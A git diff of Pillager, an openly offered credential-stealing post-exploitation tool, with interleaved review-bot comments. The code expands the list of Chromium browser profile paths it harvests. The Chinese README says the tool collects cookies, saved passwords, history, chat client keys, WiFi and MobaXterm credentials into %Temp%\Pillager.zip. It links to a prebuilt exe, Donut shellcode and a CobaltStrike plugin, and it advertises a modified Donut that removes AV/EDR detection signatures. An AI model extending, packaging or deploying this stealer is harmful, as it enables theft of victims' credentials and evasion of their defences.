diff --git a/Pillager/Browsers/Chrome.cs b/Pillager/Browsers/Chrome.cs
index 04c4551..e3e9456 100644
--- a/Pillager/Browsers/Chrome.cs
+++ b/Pillager/Browsers/Chrome.cs
@@ -1,4 +1,5 @@
 using System;
+using System.Collections.Generic;
 using System.IO;
 using System.Security.Cryptography;
 using System.Text;
@@ -14,6 +15,30 @@ namespace Pillager.Browsers
 public byte[] MasterKey { get; set; }
+ public static Dictionary browserOnChromium = new Dictionary
+ {
+ { "Chrome", "Google\\Chrome\\User Data" } ,
+ { "Chrome Beta", "Google\\Chrome Beta\\User Data" } ,
+ { "Chromium", "Chromium\\User Data" } ,
+ { "Chrome SxS", "Google\\Chrome SxS\\User Data" },
+ { "Edge", "Microsoft\\Edge\\User Data" } ,
+ { "Brave-Browser", "BraveSoftware\\Brave-Browser\\User Data" } ,
+ { "QQBrowser", "Tencent\\QQBrowser\\User Data" } ,
+ { "SogouExplorer", "Sogou\\SogouExplorer\\User Data" } ,
+ { "Vivaldi", "Vivaldi\\User Data" } ,
+ { "CocCoc", "CocCoc\\Browser\\User Data" },
+ { "Torch", "Torch\\User Data" },
+ { "Kometa", "Kometa\\User Data" },
+ { "Orbitum", "Orbitum\\User Data" },
+ { "CentBrowser", "CentBrowser\\User Data" },
+ { "7Star", "7Star\\7Star\\User Data" },
+ { "Sputnik", "Sputnik\\Sputnik\\User Data" },
+ { "Epic Privacy Browser", "Epic Privacy Browser\\User Data" },
+ { "Uran", "uCozMedia\\Uran\\User Data" },
+ { "Yandex", "Yandex\\YandexBrowser\\User Data" },
+ { "Iridium", "Iridium\\User Data" },
+ };
+
 private string[] profiles = {
 "Default",
 "Profile 1",
diff --git a/Pillager/Program.cs b/Pillager/Program.cs
index ab5520d..dfc3a84 100644
--- a/Pillager/Program.cs
+++ b/Pillager/Program.cs
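Review bot: `browserOnChromium` in the second Chrome.cs hunk is a public, mutable static field, so any code in the assembly can add, remove or replace entries after start-up; declaring it `public static readonly` and giving it a PascalCase name like the neighbouring `MasterKey` would close that off. The table also has no comment: the Program.cs hunk joins each value onto `Environment.SpecialFolder.LocalApplicationData`, so a line such as `// Value = profile root relative to %LOCALAPPDATA%` would say what the strings mean. For readers on the defending side, these relative paths are the `User Data` directories the tool opens, so reads of them by a process that is not the owning browser are the behaviour to alert on. The README table in this commit has no Iridium row although the dictionary adds one, and the enclosing class starts and ends outside the hunk.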
@@ -30,25 +30,12 @@ namespace Pillager
 //Browsers
 IE.Save(savepath);
 OldSogou.Save(savepath);//SogouExplorer < 12.x
- FireFox.Save(savepath);
- List> browserOnChromium = new List>()
- {
- new List() { "Chrome", "Google\\Chrome\\User Data" } ,
- new List() { "Chrome Beta", "Google\\Chrome Beta\\User Data" } ,
- new List() { "Chromium", "Chromium\\User Data" } ,
- new List() { "Edge", "Microsoft\\Edge\\User Data" } ,
- new List() { "Brave-Browser", "BraveSoftware\\Brave-Browser\\User Data" } ,
- new List() { "QQBrowser", "Tencent\\QQBrowser\\User Data" } ,
- new List() { "SogouExplorer", "Sogou\\SogouExplorer\\User Data" } ,
- new List() { "Vivaldi", "Vivaldi\\User Data" } ,
- new List() { "CocCoc", "CocCoc\\Browser\\User Data" }
- //new List() { "", "" } ,
- };
- foreach (List browser in browserOnChromium)
+ FireFox.Save(savepath);
+ foreach (var browser in Chrome.browserOnChromium)
 {
 string chromepath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData),
- browser[1]);
- Chrome chrome = new Chrome(browser[0], chromepath);
+ browser.Value);
+ Chrome chrome = new Chrome(browser.Key, chromepath);
 chrome.Save(savepath);
 }
diff --git a/README.md b/README.md
index dd0dd87..a918363 100644
--- a/README.md
+++ b/README.md
@@ -4,11 +4,9 @@
 ## 介绍
-这是一个敏感信息提取工具,将会长期维护,如果有任何问题或建议,欢迎发issues
+Pillager是一个适用于后渗透期间的信息收集工具,可以收集目标机器上敏感信息,方便下一步渗透工作的进行。
-在整理工具的过程中,发现目前的信息提取工具,普遍存在各种问题,最常见的如体积过大,缺少维护,于是自己在现有工具的基础上进行整理,得到了这款工具
-
-目前支持:
+## 支持
 | Browser | BookMarks | Cookies | Passwords | Historys | Local Storage | Extension Settings |
 | :------------ | :-------: | :-----: | :-------: | :------: | :-----------: | :----------------: |
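Review bot: The `foreach` in the Program.cs hunk now enumerates `Chrome.browserOnChromium`, a `Dictionary`, whose enumeration order the framework does not guarantee, so the processing order is no longer fixed by the source as it was with the removed `List`. If the order matters for the output, keep an ordered collection or sort the keys first; if it does not, a comment such as `// processing order of the browsers is irrelevant` would record that. The `FireFox.Save(savepath);` line is removed and re-added with no visible textual difference, which looks like a whitespace-only change that could be left out of the commit. The enclosing method starts and ends outside the hunk.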
@@ -16,14 +14,26 @@
 | Edge | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ |
 | Chrome | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ |
 | Chrome Beta | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ |
+| Chrome SxS | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ |
 | Chromium | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ |
-| Brave-Browser | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ |
-| QQBrowser | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ |
-| SogouExplorer | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ |
-| Vivaldi | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ |
-| CocCoc | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ |
+| Brave-Browser | ✅ | ✅ | ✅ | ✅ | 🚧 | 🚧 |
+| QQBrowser | ✅ | ✅ | ✅ | ✅ | 🚧 | 🚧 |
+| SogouExplorer | ✅ | ✅ | ✅ | ✅ | 🚧 | 🚧 |
+| Vivaldi | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 |
+| CocCoc | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 |
+| Torch | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 |
+| Kometa | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 |
+| Orbitum | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 |
+| CentBrowser | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 |
+| 7Star | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 |
+| Sputnik | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 |
+| Epic Privacy | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 |
+| Uran | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 |
+| Yandex | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 |
 | FireFox | ✅ | ✅ | ✅ | ✅ | ❌ | ❌ |
+注:✅表示经过测试,🚧表示理论上支持但未经测试,❌表示无此功能或不支持
 | IM | Support |
 | -------- | ------------------ |
 | QQ | ClientKey(Email) |
@@ -34,14 +44,27 @@
 | --------- | ------------------- |
 | MobaXterm | Password/Credential |
+| Others | Support |
+| ------ | -------- |
+| Wifi | Password |
+
 后续将会陆续添加支持的软件
+## 使用方法
+
+此项目使用Github Action自动编译打包,并上传至[Release](https://github.com/qwqdanchun/Pillager/releases),其中
+
+* [Pillager.exe](https://github.com/qwqdanchun/Pillager/releases/download/AutoBuild/Pillager.exe) 为.Net Framework v3.5编译生成的exe
+* [Pillager.bin](https://github.com/qwqdanchun/Pillager/releases/download/AutoBuild/Pillager.bin) Donut打包的raw格式的shellcode
+* [cs-plugin.zip](https://github.com/qwqdanchun/Pillager/releases/download/AutoBuild/cs-plugin.zip) 为适用于CobaltStrike使用的插件
+
+使用CobaltStrike可以直接下载插件包,其他人推荐将shellcode集成至自己的加载器或工具中运行,不建议直接使用Pillager.exe
+
+执行后会将文件打包至 `%Temp%\Pillager.zip`,需要自行前往目录下载文件或修改代码将文件上传至他处
+
 ## 优点
-体积小,长期维护,shellcode兼容.Net Framework 2.x/3.x/4.x , shellcode兼容x86/x64,执行后文件输出至 `%Temp%\Pillager.zip`
-
-## 编译
-
-Release有Github Action自动编译的exe及shellcode,可以直接使用
-
-为了方便使用,Release附带了cs插件版本,使用Pillager命令即可执行
+* 体积在100kb左右,为同类工具体积的几分之一甚至几十分之一
+* 支持大部分常见浏览器,常见聊天软件的信息提取,将陆续添加其他常用工具的信息收集
+* 长期维护,有问题可以及时的反馈处理
+* 使用魔改版本的Donut,缩小shellcode体积,使shellcode兼容.Net Framework v3.5/v4.x,并去除AV/EDR对Donut提取的特征